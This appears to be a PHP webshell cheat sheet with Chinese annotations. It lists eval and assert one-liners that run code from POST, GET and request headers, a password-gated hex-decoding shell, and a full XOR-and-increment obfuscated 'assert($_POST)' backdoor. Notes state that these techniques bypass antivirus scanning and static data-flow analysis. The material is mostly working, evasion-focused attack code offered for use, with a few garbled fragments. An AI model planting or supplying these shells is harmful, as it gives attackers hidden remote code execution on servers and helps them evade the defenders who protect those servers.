eval($GLOBALS['_POST']['op']);
$_FILE
eval($_FILE['name']);
eval(${"_PO"."ST"} ['sz']);
$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
$a=$_GET['a'];$a($_GET['b']);
$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
preg_replace
str_replace(” “, “e v a l”)
"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
$a="a";$a++;
$a='';$a.=[]; // Array
__FILE__
$a="e"."v"./*-/*-*/"a"./*-*/"l";
ReflectionFunction
mb_eregi_replace('.*',$_GET[1],'','e');
set_error_handler + trigger_error
putenv($_GET["c"]);eval(getenv('path'));
parse_str
parse_url
extract
token_get_all
define
$a = filter_input(INPUT_GET,'c');
eval(end(getallheaders()));
get_defined_vars
getallheaders
get_meta_tags
phpinfo
外部变量 / 文件信息
重载 toString
base64_decode
base64_encode
str_replace
str_rot13
strtok
strtolower
strtoupper
strtr
substr
substr_replace
trim
ucfirst
ucwords
array_filter
array_map
array_reduce
array_walk
array_walk
array_walk_recursive
call_user_func
call_user_func_array
filter_var
filter_var_array
preg_replace_callback
register_tick_function
registregister_shutdown_function
uasort
uksort
mcrypt_encrypt
openssl_encrypt
FFI
SimpleXML
SimpleXMLElement
使用自定义的加解密函数,在一定程度上可以绕过一些防护软件的查杀,下面的代码是一个基于十六进制的执行的简单例子。
$string = '';
$password = 'password';
if(isset($_POST[$password])){
$hex = $_POST[$password];
for($i = 0; $i < strlen($hex) - 1; $i += 2) {
$string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
}
eval($string);
PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。
<?=`{${~"\xa0\xb8\xba\xab"}[~"\xa0"]}`;
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_]));
基于混淆影响程序分析
基于动态变量影响程序执行
抛出异常打断数据流分析
基于反射打断数据流分析
基于引用传递打断数据流分析